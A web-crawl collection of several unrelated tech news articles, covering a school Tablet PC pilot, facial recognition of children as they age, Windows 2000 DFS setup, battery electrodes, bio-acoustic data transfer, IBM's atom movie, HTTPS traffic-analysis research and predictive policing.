Hinsdale had wanted to replace its stationary desktop PCs with more-mobile hardware, which would allow increased student and teacher interaction and better student collaboration. Various laptop models werent ideal for the classroom environment because their screens created a barrier between teachers and students, said James Polzin, assistant superintendent for the school district, in Hinsdale. But the Tablet PC, which allows students to input data with the units laying flat on their desks, solved the problem.
"It was the most intriguing thing wed seen, and it eliminated the screen as an upright barrier. Plus, we could do annotation in color, inking in color, highlighting, diagrams," said Mark Pennington, assistant principal. "It really brought thoughts to paper in a colorful way that can be shared electronically."
eWEEK.coms David Coursey sees a Tablet PC in your future. Click here to read more.
Coupled with wireless projectors from InFocus Corp., Toshiba Portégé M200 Tablet PCs would allow teachers to project their notes onto a screen, leaving them free to walk around the classroom and interact with students. Students can also share their work with other students via the projectors, without the fear of having to walk to the blackboard.
Using the tablets stylus, teachers can annotate changes on students tablets and project those changes on the screen for the class.
But picking the right hardware was a small step compared with the undertaking Hinsdale had ahead. Introducing a new technology into a school system presents numerous barriers, including cost justification, teacher adoption, instructor training and hardware implementation.
To tackle that effort, as well as the hardware procurement, Hinsdale turned to CDW Government Inc., a Vernon Hills, Ill., reseller for the education and government sectors. Hinsdale had worked with CDW-G in the past, mostly on hardware for its administrative offices.
Hinsdales idea: a pilot test. So with CDW-Gs help, the school last year launched a pilot test in one of its math classes whose PCs were up for replacement. During the pilot test, all the schools teachers were required to visit the class at some point to see the technology in action.
"We made sure that everybody who could be impacted was involved in the process from understanding it to providing feedback and input," said Polzin.
The pilot test was a success, according to Polzin, and it helped those leading the charge to gain approval from teachersa big part of implementing new technologies in a school system.
The pilot test also helped Hinsdale prove to the board of education that Tablet PCs offered enough educational value over laptops to justify the extra cost.
"Tablets are more expensive than traditional desktops, and we had to work with the board of education for financial support," said Polzin.
Training the Teachers | <urn:uuid:508322e2-619d-43d6-940d-4fe7c063a356> | CC-MAIN-2017-09 | http://www.eweek.com/c/a/Desktops-and-Notebooks/Big-WLAN-on-Campus | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00565-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967157 | 674 | 2.578125 | 3 |
This story began with a simple question: if a facial recognition system processes a lot of pictures of a child, will it recognize that person when he or she grows up?
If I were to upload all my childhood photos to Facebook (or some future Facebook), could a biometric identification system link the button-nosed, round-cheeked child with a bowl cut to my adult face, which has lost its button, cheeks, and hair?
It's not an idle question: parents are posting millions of photos of their children to social networking sites, as are kids themselves when they are old enough to use Facebook and the like. Will these photos permanently identify them as they grow older, linking their childhood or teenage antics to their adult identities?
Or does the natural aging process provide some level of protection from the prying computations of facial recognition algorithms? If I can barely identify myself in photos from my childhood, what hope does a computer have?
There is no simple answer, though there is a good theoretical lower age-limit: it would be very difficult for a facial recognition system to match up a photograph of a child under the age of seven with a photograph of that same person as an adult.
And, in practice, most facial recognition systems aren't close to being able to do this kind of identification in the field. Still, that might not allay the worries of technology thinkers like Amy Webb, who recently warned parents to post no photographs of their children online because "ubiquitous bio-identification is only just getting started."
What's at stake is this: how firmly do we want the media that children produce to attach to their adult identities? For most current adults, the pictures and videos we made as kids are not searchable or accessible, except for the hand-curated selections of "throwback Thursday."
Kids now are growing up on the Internet are trailed by an ever larger and deeper digital footprint. The danger is that it might restrict their freedom to develop as future people. Algorithms rely on what they know about someone's childhood to channel their possibilities as an adult.
If pictures (or YouTube videos) from your youth can be connected to your adult identity, it would, at the very least, increase the ethical complexity of posting or hosting images of children.
Let's get into the details.
This kind of facial recognition work emerges from very different places: forensic scientists, pure computer scientists, and facial recognition practitioners. Forensic scientists are trying to solve a very practical problem: if a child goes missing for some long period of time, how can law enforcement create a more up-to-date portrait of the child? They want a system that can artificially age a missing child's face. We all know kids change, but that's not the kind of rigorous analysis one needs to Photoshop five years onto a child's visage. Artificial aging is almost the reverse of what a facial recognition system would do.
The fastest changes are between infancy to 3, and then during adolescence (after 10 years old) into adulthood, said Alex Cybulski, a doctoral candidate at the University of Toronto Information School, where he's studying surveillance. "You can understand how this complicates things as the changes to the craniofacial shape and texture of a face during the early period of an individual's life are rapid and thus elusive to estimation by computer modeling for the purposes of facial recognition."
Elusive, perhaps, but not impossible. Cybulski pointed to the work of forensic researcher Stuart Gibson at the University of Kent, who "has proposed that because of the way in which the face changes during [childhood] starting at age seven is considered the maximum range through which changes can be estimated and therefore, reliably compared."
What Gibson has done is try to take images of children at various ages and build computer models that attempt to artificially age them. So, for example, here, the photos on the far left (A) and right (F) are actual pictures of the subjects. Columns B through E show different algorithmic projections based on his models.
One can imagine that these attempts to quantitatively model the changes in bone structure, skin texture, and other aesthetic variables might lead to a better facial recognition system.
Another place this quixotic question led me was to mathematicians like Nigel Boston at the University of Wisconsin, Madison. He referred me to the work of UCLA's Stephen Soatto.
For Soatto, a face is shape-space with certain properties. "Your identity is what is left invariant by some class of transformations," is how he put it to me. For him, the problem is that if we want to match photos or discriminate between individuals, there are two kinds of variability. One is intrinsic—my face now versus my face 25 years ago—but the other is "nuisance variability," or features of images that are irrelevant to my identity.
Soatto wrote a paper on getting rid of this kind of variability with respect to focal length in images, which heavily distort people's faces (especially the front-facing one on your phone: "you cannot see your ears, your nose looks bigger"). And he saw a parallel between the mathematics underlying that research and quantifying the effects of aging. In our specific question, the nuisance variability we are trying to eliminate is time, and "the way in which time affects your data is very complex, but mathematically it is a 1-parameter morphism that deforms your face," Soatto said.
He believes that using the same methodology as in the focal length study could be applied to aging and facial recognition. They could feed lots of images into the model and "learn away the variability," he said. "Conceptually, it is exactly the same thing. The only difficulty is getting the data for this. You need consent and it would be a long, longitudinal study."
The challenge, of course, is that we all age differently, but "there is geometric consistency because faces are not arbitrary objects." One can expect crow's feet and a wobblier jaw, for example. Or for children, one can expect the size of the forehead to even out relative to the rest of the face.
Perhaps some set of the dozens of possible landmarks on a face hold constant, or the relationships between them do.
How good could a computer system get at this kind of computation?
"Suppose we take your two photos separated by x years. To keep things simple, assume they are portraits (frontal pose, neutral expression and uniform illumination). Generally, if x < 10 years, high matching accuracy will be maintained by state of the art face recognition systems. But because different persons age differently, this value of x may vary from person to person," a computer vision practitioner Anil Jain, a professor at Michigan State, told me in an email.
Children, of course, would be more difficult. And, Jain noted, that face matching in "unconstrained settings" like surveillance video or random snapshots "poses challenges."
But most of the work that's been done by academics draws on dozens to thousands of photographs. What happens when one attains Facebook scale, billions of photos, with thousands (or even tens of thousands) of images of an individual through time?
"We will likely see much more work on this once social networks have built up libraries of digital images of people at different ages," said Yana Welinder, an affiliate scholar at Stanford's Center for the Internet and Society, who has studied facial recognition. You can bet that Facebook is going to try to identify its users no matter how old they are, or in whose pictures they appear. And they'll probably get good, too, as the "unreasonable effectiveness of data" makes their algorithms better.
Will computers ever get better than humans?
Soatto, for one, doubts it. Facial recognition, after all, is a remarkably difficult task that (almost) all humans are exceptional at. "The reality is that it is so complex and humans are so attuned to very subtle cues on the human face that it would be very difficult for an engineered system to mimic or exceed the extrapolated abilities of humans," he said.
The problem is that it goes to "the core of what knowledge and learning is," Soatto said. "There is tons of data and the data is not information. Information is what is left in the data after you throw away what doesn't matter to your task. You've picked one source of nuisance variability, which is age, and that's a tough one. But that same conundrum permeates every other branch of knowledge and learning."
The fundamental nature of the problem might suggest that until the machines can learn as well as we do, it will be difficult for them to overtake us in facial recognition tasks. | <urn:uuid:b6f22560-a9d2-4eda-89e7-6cbb7ffce322> | CC-MAIN-2017-09 | http://www.nextgov.com/big-data/2014/05/computers-see-your-face-child-will-they-recognize-you-adult/84319/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00089-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964146 | 1,801 | 2.796875 | 3 |
Using the Windows 2000 Distributed File System
In Windows NT 4.0, Microsoft provided an add-on product called Distributed File System (DFS) that allowed physically separate network file resources to be grouped together and accessed as if they were a single logical structure. The product, which was a free download, failed to make a great impact with network administrators and went largely unnoticed. With Windows 2000, DFS is included with the OS and provides a number of new functions. The tool for managing the DFS structure has been improved, and wizards serve to make setup an easy task.
DFS is a service that gives administrators a way to provide users with simple access to increasingly distributed amounts of data. In this article, I will look at some of the features of DFS and how to create a DFS tree in Windows 2000.
|DFS in a Heterogeneous Environment|
The functionality of DFS is not just limited to Microsoft Operating systems. For instance, if the server hosting the DFS root has access to a NetWare server through client or gateway software, directories on the NetWare server can be added to the DFS tree. This is a major advantage to administrators managing data in a heterogeneous environment.[end]
DFS file structures can be accessed from any workstation that is running the DFS client software. This software is included with Windows 98, Windows NT 4.0, and Windows 2000. A downloadable client is available for systems running Windows 95. To take full advantage of the fault tolerance capabilities of DFS, the updated Active Directory Client Extensions must be installed for the respective client platforms.
What Is DFS?
DFS provides the ability to create a single logical directory tree from different areas of data. The data included in a DFS tree can be in any location accessible from the computer acting as the DFS root. In other words, the data can be on the same partition, disk, or server, or on a completely different server. As far as DFS is concerned, it makes no difference. A DFS tree appears as one contiguous directory structure, regardless of the logical or physical location of the data.
After the DFS root is created, links to directories can be added or removed to construct the single logical directory structure. The DFS tree can be navigated using standard file utilities such as Windows Explorer. Unless users are made aware of the fact that the data is being accessed from different locations, they will not realize that they are using a DFS system at all.
DFS trees can be used with both FAT and NTFS partitions. If you do use NTFS, the inclusion of a file or directory in a DFS structure has no effect on security permissions.
There are two types of DFS:
- Stand-alone DFS--Refers to a DFS tree that is hosted on a single physical server, and is accessed by connecting to a DFS share point on that server. DFS configuration information is stored in the server's Registry. Stand-alone DFS provides no fault tolerance. If the server hosting the DFS root should go down, users will no longer be able to access their data unless they explicitly know where the data is stored.
- Domain DFS--Provides more functionality, including features such as replication and load-balancing capabilities. Domain DFS information is stored in Active Directory. A domain member server must act as the host for the DFS tree. By storing the domain DFS configuration in Active Directory, the server-centric nature of stand-alone DFS is removed, enabling the administrator to create DFS root replicas. If a server were to go down, users would be redirected to a DFS root replica and could continue to access the DFS tree.
|DFS Disk Space Reports|
When a DFS share is accessed, the amount of free disk space on the drive is reported for the drive that hosts the DFS root. This amount will often differ from the amount of disk space available through different areas of the DFS structure. As an administrator, this change is easy to account for, but it can be confusing for users.
Advantages of DFS
DFS brings with it advantages for both users and administrators. All the directories and files users need to access exist in one easy-to-navigate structure. This has two effects. First, users can easily locate data, reducing the need for administrative assistance. Second, users can more easily save data in the right place, thereby increasing the effectiveness of backups and reducing related support calls. From an administrative perspective, DFS provides the ability to manage data from within one simplified structure. Other benefits include the ability to move a data structure from its original location to another drive, or even another server, without affecting the DFS structure or the users' perception of the location of the data.
Creating a DFS Tree
The initial creation of a DFS tree takes just a couple of minutes, thanks to a wizard that guides you through the necessary steps. The wizard is accessed from within the Distributed File System management utility, which can be found in the Administrative Tools menu. After starting the Management Utility, choose Action|New to launch the DFS Root Creation Wizard. After you click Next on the introduction screen, the wizard prompts you to select whether to create a stand-alone DFS root or a domain DFS root. For this example, I will create a domain DFS root.
The next two screens allow you to select first the domain, and then the server that will host the DFS root. Each server can only host one DFS root. The following screen requires that you specify the share point at which you wish to create the DFS root. You can either select an existing share by using the drop-down box, or create a new share point for the DFS root. The next screen allows you to specify a name for the DFS root, and to include a comment. Clicking Next then takes you to a summary screen, in which you can check the information that has been entered. Figure 1 shows a completed summary screen. Once the information has been checked, click Finish to create the new DFS system.
Adding new links to the DFS tree is simple. With the DFS root object selected in the management utility, right-click and choose New DFS Link. Then, simply add the path to the data you want included in the DFS tree. Repeat this procedure for each data area that you wish to add to the tree. In Figure 2, you can see the view of a DFS tree with a number of links added. The left pane shows the DFS Management Utility; the right pane shows what the tree looks like when viewed through Windows Explorer.
DFS provides a simple solution to one of network administration's most time-consuming challenges: managing data access. By creating a DFS tree, Windows 2000 administrators can manage data easily. //
Drew Bird (MCT, MCNI) is a freelance instructor and technical writer. He has been working in the IT industry for 12 years and currently lives in Kelowna, Canada. You can e-mail Drew at email@example.com. | <urn:uuid:3d638ecc-5faf-43da-9237-4ccabed2998b> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/624521/Using-the-Windows-2000-Distributed-File-System.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00562-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.909112 | 1,476 | 2.71875 | 3 |
As our increasingly wireless and gadget-filled world demands better screens and more complex functions, the underlying technology that may be showing the most signs of strain is also one of the oldest: batteries. Threatened with replacement and subject to massive recalls, the battery technology that we all rely on has shown signs of draining under the stress. But help may be on the way: researchers at Argonne National Labs are presenting data (PDF) on a method that provides a big boost to existing lithium ion batteries.
The researchers were able to get charge capacities of well above 250 mAh/g (more than twice the charge held by lithium ion batteries currently on the market) simply by replacing one of the electrodes. The new electrode relies on a layered-layered structure that includes a lithium-manganese oxide component. The new material apparently transfers charge both by freeing lithium ions and by reactions involving the manganese oxide itself.
Theoretically, these reactions should add up to a charge capacity of slightly below the 250 mAh/g figure, but the authors were surprised to find that capacity came in over 300 mAh/g when tested at 50°C, leading them to term the charging behavior "anomalous." It doesn't appear that they yet understand why it works so well, as their abstract says that "possible reasons for the anomalously high capacity and the electrochemical cycling stability of these manganese-rich electrodes will be discussed in this presentation."'
This new battery tech isn't ready for prime time yet, in part because the manganese reactions are predicted to damage the electrodes themselves. Even though the abstract suggests that they are unexpectedly stable, performance does decline too fast for commercial use: by 16 percent in as few as 10 charges. The reactions also produce oxygen during discharge of the battery, which will have to be rid of in some way. But there's reason to think that these problems will be overcome: in addition to allowing greater power capacity, manganese is much cheaper than what's currently in use. | <urn:uuid:8a0e7b8b-cbdd-4f6d-87f3-7db998d16aa5> | CC-MAIN-2017-09 | https://arstechnica.com/gadgets/2007/05/manganese-electrode-could-double-litium-ion-battery-capacity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00562-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964637 | 411 | 3.671875 | 4 |
Imagine being able to securely open the front door to your home by simply touching the handle. Through a combination of your mobile device and your skeletal frame-which can uniquely identify you — this can happen today. No need to fumble through your belongings to find your keys or your cell phone — a device on your body, such as a watch, could do the unlocking for you. Need to transfer secure data or exchange information with a colleague or friend quickly? It can happen with a simple handshake — literally. Researchers in AT&T Labs are developing new technologies that allow all of this to happen.
How did the Idea Hatch?
The prototype for this technology is based on previous work in AT&T Labs that involved recognizing soft fingertip gestures (tap, rub, etc.) by listening to the sounds they make using a piezo-electric transducer. While testing the gesture recognizer, researchers transmitted music through the body to calibrate the system and realized that this idea could be extended to transmit data from body to solid object or body to body using vibrations.
About the Project
Bio-acoustic Data Transfer is demonstrated by key transmission through bone conduction. This is done by attaching a piezo-electric transducer to a mobile device, watch or other devices. When the user approaches the door, a unique digital key will be transferred to the lock. If the key matches, the deadbolt will unlock. This is made possible by a person's unique skeletal structure and bone density, so if the key is stolen it will not work for the intruder.
Additional research into Bio-acoustic Data Transfer is underway to ensure the accuracy of unlocking a deadbolt, as well as data transfer of short messages, like contact information. In the future, AT&T Labs researchers foresee multiple advancements in this technology, including:
- Handshake Data Transfer. While shaking someone's hand for the first time your contact information or any other data that you wish to share, could be sent from one body to the other.
- A safer home. If an intruder tried to enter your home, alerts could be sent through your mobile device to let you know.
- Eliminating clutter. By essentially combining your house key and mobile phone, there is less of a hassle for a user by eliminating the need for a key.
- Transferring data between devices. Alternatively to transferring data between individuals, this technology allows for easy document transfers between your devices, such as tablets and mobile phones.
About the Researcher
Brian Amento is a Principal Technical Staff Member at AT&T Labs — Research for 14 years, working in the Human Computer Interface Research group. Brian received his PhD in Computer Science from Virginia Polytechnic Institute and State University. His research interests include novel interaction techniques, mining implicit social data and enabling ubiquitous collaboration. He has served as an adjunct faculty member at New York University and is currently a research professor at the New Jersey Institute of Technology. His current research work includes collaborative music listening, vibration based networking, and large multi-touch surface interfaces. | <urn:uuid:97b15f61-2d7c-483a-8ee8-0681ef3c025d> | CC-MAIN-2017-09 | https://www.att.com/gen/press-room?pid=22683 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00086-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.934372 | 618 | 2.546875 | 3 |
Atom manipulation makes for world record.
IBM (NYSE:IBM) produces the worst animated movie I've ever seen. Terrible production values, laughable plot, and awful soundtrack. At least it's mercifully short. Two thumbs down. Still, it does at least show what's possible when you manipulate and photograph individual atoms.
In IT Blogwatch, bloggers think... and make Heisenberg gags.
Your humble blogwatcher curated these bloggy bits for your entertainment.
Seth Borenstein reports:
Scientists have taken the idea of a film short down to new levels. ... IBM says it has made the tiniest stop-motion movie ever [made] of individual carbon monoxide molecules.
...Each frame measures 45 by 25 nanometers — there are 25 million nanometers in an inch. ... IBM used a remotely operated two-ton scanning tunneling microscope...at 450 degrees below zero Fahrenheit (268 degrees below zero Celsius). MORE
Jason Palmer speaks unto nation:
The stop-motion animation uses a few dozen carbon atoms, moved around with the tiny tip of...a scanning tunnelling microscope. ... The extraordinary feat of atomic precision has been certified by the Guinness Book of World Records. ... The device works by passing an electrically charged, phenomenally sharp metal needle across the surface. ... As the tip nears features on the surface, the charge can "jump the gap" in a quantum physics effect called tunnelling.
...It underlines the growing ability of scientists to manipulate matter on the atomic level, which IBM scientists hope to use to create future data storage solutions. MORE
SPOILER WARNING: Daniel Terdiman tells us the plot:
Called "A boy and his atom," the animated film features a small boy having a good old time as he bounces around, playing catch, and dancing [in] 130 atoms that were painstakingly placed, atom by atom.
...four researchers spent nine 18-hour days moving the 130 atoms around so they could create the exact imagery they needed for their film. MORE
Yes, yes. Great fun, but WHY, Gareth Halfacree?
It's not all about frivolity and the kudos that comes with an unlikely entry in the Guinness Book of World Records, though. ... IBM is hoping that the technology...will pave the way forward for novel computer circuits that can bypass the rapidly-approaching physical limits that threaten to put an end to Moore's Law. .
...The team behind the animation has already created the world's smallest magnetic bit, constructed from just 12 atoms - compared to the million atoms a traditional bit takes up on a mechanical hard drive. MORE
Meanwhile, ifeu quips, uncertainly:
So... did the boy act differently when he was watched?. MORE
Subscribe now to the Blogs Newsletter for a daily summary of the most recent and relevant blog posts at Computerworld. | <urn:uuid:85d2d0a5-4d46-4aea-a85e-46260c2b4588> | CC-MAIN-2017-09 | http://www.computerworld.com/article/2475257/data-center/ibm-makes-feeble-movie-about-a-boy--madewithatoms.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00558-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9172 | 596 | 2.515625 | 3 |
University researchers have developed a technique that governments and Internet service providers could use to bypass secured Internet connections and gather valuable personal information.
The "analysis attack" on HTTPS traffic had an 89 percent accuracy rate in determining the Web pages a person visited, according to University of California, Berkeley, researchers. Such tracking made it possible for the researchers to gather information on medical conditions, sexual orientation, financial status and whether a person is involved in a divorce or bankruptcy proceeding.
The study looked at more than 463,000 page loads on 10 widely used, industry-leading websites. Healthcare sites included those of the Mayo Clinic, Planned Parenthood and Kaiser Permanente; financial sites belonged to Wells Fargo, Bank of America and Vanguard; legal services sites belonged to the American Civil Liberties Union and Legal Zoom; and video-streaming sites included Netflix and YouTube.
For the attack to work, snoops would have to be able to visit the same Web pages as the victim, which would enable the attackers to identify packet patterns in encrypted traffic that would be indicative of different Web pages.
"It would be like if somebody gave you a bicycle but took it apart and wrapped each piece individually," Brad Miller, co-author of the study told CSOonline Monday. "You would quickly notice that there were two big packages which look like wheels, a frame, a squiggly one that corresponds to a chain, etc.
"It's the same way with a Web page. Because we watch each of the parts be delivered individually, there ends up being so much information which you can observe without decrypting the packets that you can quite likely figure out the exact Web page."
The attackers must also be able to observe victim traffic, which would allow them to match those packet patterns with the ones going to particular Web pages.
The researchers also developed a defense that involved reducing the amount of packet information an attacker could gather. The technique lowered the accuracy of identifying Web pages visited by people from 89 percent to 27 percent.
The research has important privacy implications. Being able to examine user activity on a healthcare site could reveal medical conditions, which could lead to discrimination or could be sold to advertisers looking to pitch products.
Monitoring legal site traffic could uncover a divorce, bankruptcy or immigration status, while analyzing traffic on a banking site could provide insight on whether a person has children, is in a long-term relationship or is in a high-income bracket.
Any company with access to HTTPS traffic, such as Internet service providers and commercial chains of Wi-Fi access points, could gather data on users despite the encryption and sell the information to advertisers, the study said.
Employers could monitor the activities of employees while they are on the corporate network, regardless whether they are using a personal or employer-issued device.
Finally, governments could find the collected information useful to find criminals and to punish political dissidents or people who defy censors, the study said. In China, for example, the social media firm Sina recently punished more than 100,000 users through account suspensions and occasional public admonishment for violating the government's guidelines for Internet use.
This story, "Researchers Attack Secured Internet Activity to Mine Personal Data" was originally published by CSO. | <urn:uuid:f9a0dea0-b78a-42bf-973d-f9b0b68ed3cc> | CC-MAIN-2017-09 | http://www.cio.com/article/2378010/security0/researchers-attack-secured-internet-activity-to-mine-personal-data.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00082-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949884 | 654 | 2.59375 | 3 |
Google has entered into a partnership with Douglasville- Douglas County Water and Sewer Authority to recycle greywater for cooling its data center in Douglas County, Georgia. Greywater is the water that is recycled from showers and bathtubs from residential facilities. Normally, this greywater finds its way into the River Chattahoochee.
The rationale behind using such water is that water for cooling purposes need not be sterile and fit enough for drinking. Therefore Google has invested in building a sidestream treatment plant which takes in this greywater and puts it through a process of sterilization, filtration and chlorination which cleans it for use in the evaporative cooling tower that Google has.
Google has taken this a step further by putting the water that does not evaporate during this process through an Effluent Treatment Plant which disinfects and cleans it of particulate matter and then pumps it into the Chattahoochee River.
With this water purification and utilization system, Google has created a 100% recycled water plant for its own operations.
Read More About Google | <urn:uuid:bca3b6d2-16d1-4a0d-81a2-c3601de11ec4> | CC-MAIN-2017-09 | http://www.datacenterjournal.com/google-recycling-water-for-data-center-cooling/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00434-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.956809 | 215 | 2.65625 | 3 |
What's the difference between a robotic car made by Google, and the ones made by actual carmakers? The future, as always, was on display at the Consumer Electronics Show today, where Toyota and Audi unveiled their new autonomous cars of the future — concepts that should not be confused with the Google version, which is a self-driving car. Now, they're pretty much the same thing, with a series of sensors and automated controls that let a car think and act on its own. The much discussed Google car has a camera on top with a special LIDAR sensor and so does Toyota's new Lexus LS sedan. What the Google car doesn't have is a name like the Lexus's: Advanced Active Safety Research Vehicle.
Google chief Eric Schmidt has said that he thinks cars should be able to drive themselves. The auto industry would still like to sell you a driving machine, thank you very much — and make them a lot safer. This may or may not have a lot to do with Toyota's recent struggles based on safety concerns. (Google also uses the Toyota Prius for its robot-driven car.) But, hey, the Lexus is still very cool, what with the high-definition cameras that can detect traffic signals from over 160 yards away, front- and side-facing radar, and sensors that can precisely track the orientation of the car at all times. That sounds pretty accident-proof: When nothing feels wrong, the car lets the driver do the work; when it perceives a threat, the robotic system kicks in.
As you can see with this video of Audi's Pikes Peak TTS research car, the autonomous cars of the industry's future can drive on their own — but they won't:
While Google insists that its robotic chauffeurs will make driving safer by leaving humans out of the driver's seat altogether, a lot of people don't believe that. Plus, when things go wrong, the legal implications get blurry. Humans behind the wheel make a lot of ethical questions disappear — and robot back-up might make people feel better just in case. Plus, having a robot do all the work takes the fun out of driving anyway, right? | <urn:uuid:537722a1-9b41-4980-bbca-e71ba1c48935> | CC-MAIN-2017-09 | http://www.nextgov.com/emerging-tech/2013/01/auto-industry-drops-robot-chauffeurs-favor-safest-car-all-time/60558/?oref=ng-relatedstories | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00310-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.969751 | 443 | 2.53125 | 3 |
Microsoft's research division has developed a keyboard that can interpret basic hand gestures, potentially bridging a gap between touch devices and more traditional input methods.
[See the keyboard in action in a video on YouTube.]
Presented at the Computer Human Interaction (CHI) conference in Toronto, the prototype keyboard has 64 sensors that detect the movement of hands as they brush over the top of the keyboard. Swiping a hand over the left or right side, for instance, can bring up left and right side menus in Windows 8.
The main goal is for users to be able to keep their hands on or very close to the keyboard while typing and using input gestures, said Stuart Taylor, a Microsoft senior research engineer.
Some of the gestures can replace existing keyboard shortcuts, like the Alt and Tab combination for switching between applications.
"What we've found is that for some of the more complicated keyboard shortcut combinations, performing gestures seems to be a lot less overhead for the user," he said.
Gesture control in touchscreens is commonplace for tasks like flicking through photos or pulling up menus. Even some mice can interpret gestures, but keyboards have largely stuck to their traditional input method.
Taylor said Microsoft's keyboard can interpret a number of gestures, though only a few were working at the conference in Toronto. He also said it's not designed to replace a mouse.
"It's less about fine-grain navigation, which would still be performed with a mouse or touchpad," he said.
The team has been working on the project for about a year-and-a-half and will continue to refine the gesture interpretation. The sensors on the keyboard are in pairs, with one sensor emitting infrared light and the other reading the light reflected back. It's not unlike the technology in Microsoft's Kinect gaming system.
Since it is still a research project there are no immediate plans for commercialization, but technology like this could give Microsoft a much-needed leg up in the computing race. | <urn:uuid:baea2dfe-3bd7-45fe-ac52-15c35c4c756a> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2176493/data-center/microsoft--39-s-prototype-keyboard-understands-gestures.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00606-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.942638 | 405 | 2.921875 | 3 |
Using statistics and analytical data to predict criminal activity has become standard practice in many police departments across the United States. Crime forecasting may get more accurate as new computer algorithms are developed, but experts believe that fresh data streams, not technology advancements, will drive innovation in predictive policing during the next 20 years.
Analysts currently identify crime trends using statistical data on arrests and 911 calls. Based on that information, police commanders deploy officers to areas they believe will be hot spots for illegal activities. But while predictive in nature, the effort is largely reactionary based on past events.
In the future, behavioral data and clues from virtual interactions may help cops stop bad guys before they’ve even drawn up a plan. Think Minority Report — the 2002 film where a police unit was able to arrest murderers before they committed a crime — on a more realistic scale.
We’re not quite there yet, however. The ability to accurately state that a crime will occur at a specific time in a small area is still very much science fiction. In reality, the process is similar to economic forecasting where different factors are compiled to build a statistical model to predict outcomes.
More sophisticated modeling can be done, but the return on investment is likely marginal as we’re close to the limits of accuracy with current data, according to John Hollywood, operations researcher with RAND Corp., a nonprofit organization that helps improve policy and decision-making through research and analysis.
“In order to really get into crystal-ball accuracy, you basically need to get inside peoples’ heads,” Hollywood said. “That is getting you out of the realm of statistics and computer science and much more into the realm of behavioral and social science.”
Noah Fritz, past president of the International Association of Crime Analysts and crime analysis manager for the San Diego County, Calif., Sheriff’s Department, agreed. He said there is potential for growth in the area of environmental criminology where you examine a person’s journey to a life of crime and peoples’ routine activities and habits.
“We all have routines, and if we make better sense of those routines I think we can then predict and forecast how many days out a person is going to commit another crime,” Fritz said. “Whether this is because they are addicted to drugs or because they have a propensity, in some ways we [need to] just do a better job of matching the temporal pattern and the geographic patterns together.”
Some hurdles remain, however. Fritz said privacy rights may impede some behavioral data progress and the U.S. doesn’t invest enough in behavioral data research and how it ties with predictive analytics.
But the work isn’t being ignored.
Overland Park, Kan., Police Chief John Douglass likened the efforts being made in behavioral data and its relation to predictive policing to cancer research. Just as cancer scientists look back in time through genetics to find common denominators so they can create a cure, Douglass said data scientists are doing the same thing by looking for criminal signatures and those factors that will help better predict criminal behavior.
One potential source for new data could be the Level of Service Inventory-Revised (LSI-R) Assessment. An internationally recognized quantitative survey of offender attributes and offender situations relevant for making decisions about levels of supervision and treatment, the LSI-R results could provide valuable data on what motivates a criminal to commit a crime. The assessment is typically given to those going on parole.
Dawn Clausius, police intelligence analyst with the Olathe, Kan., Police Department, believes that the assessment holds a mountain of untapped data for predictive policing efforts. She said that currently a prisoner’s assessment results are used only by parole officers or counselors within specific facilities. But eventually the data could be shared with detectives or police officers.
Local, state and federal government entities must get together with state corrections departments and law enforcement personnel and make an effort to share the information, Clausius said.
Instead of just identifying and arresting the bad guy, Clausius believes that if cops had the resources and ability to sit down with criminals and find out what motivated them, they could acquire data that could help prevent future crimes.
Some work is being done in the U.S. to examine how offenders behave and places they frequent in a community. Applications exist where an algorithm can provide an idea where an offender might live in relation to where crimes are occurring. But Clausius would like to see that work done on a more micro-level.
“I think that it is just a matter of making the offenders’ behavior and personality a part of the process,” Clausius said. “If you go overseas and see the intelligence being done, they look at a lot of offender behavior and offender profiles.”
Douglass agreed. He expects nontraditional information for predictive policing will come from more study of social behaviors. It’ll just take some time to make it a reality in the U.S. For example, Douglass said it took years for law enforcement to realize that 80 percent of homicides are done by people who know the victim. That revelation was 25 years ago.
Only recently, police officers have started to realize that many homicides in big cities are connected to others in the same vicinity going back a decade. Douglass said that in Kansas City, investigators were able to trace back a string of 40 or 50 murders over a 15-year period to one specific incident.
“Many of these homicides are located in a geographical area amongst a group of people who are simply retaliating back and forth in a culture where they don’t tell the police what is going on,” Douglass said. “That becomes the remedy, and consequently all these homicides are related.”
“I think that the social scientist will be able to help us determine social patterns that we will be able to take advantage of,” he added.
Social networks and virtual environments are another source of unexploited data that experts believe will impact predictive policing in the future. Platforms such as Twitter and Facebook are based on the concept of sharing details — information that law enforcement is hoping it can capitalize on.
Leonard Scott, former police chief of Corpus Christi, Texas, thinks the data gleaned from observing social media will fundamentally alter the way commanders assign patrols to certain areas.
Instead of officers being dispatched to a particular location in response to an event, the information taken from virtual existences will be used to assign a “flex unit” that will move into an area within a half mile of a particular location and watch for various disturbances. Those units are an extension of predictive policing based on social media data streams.
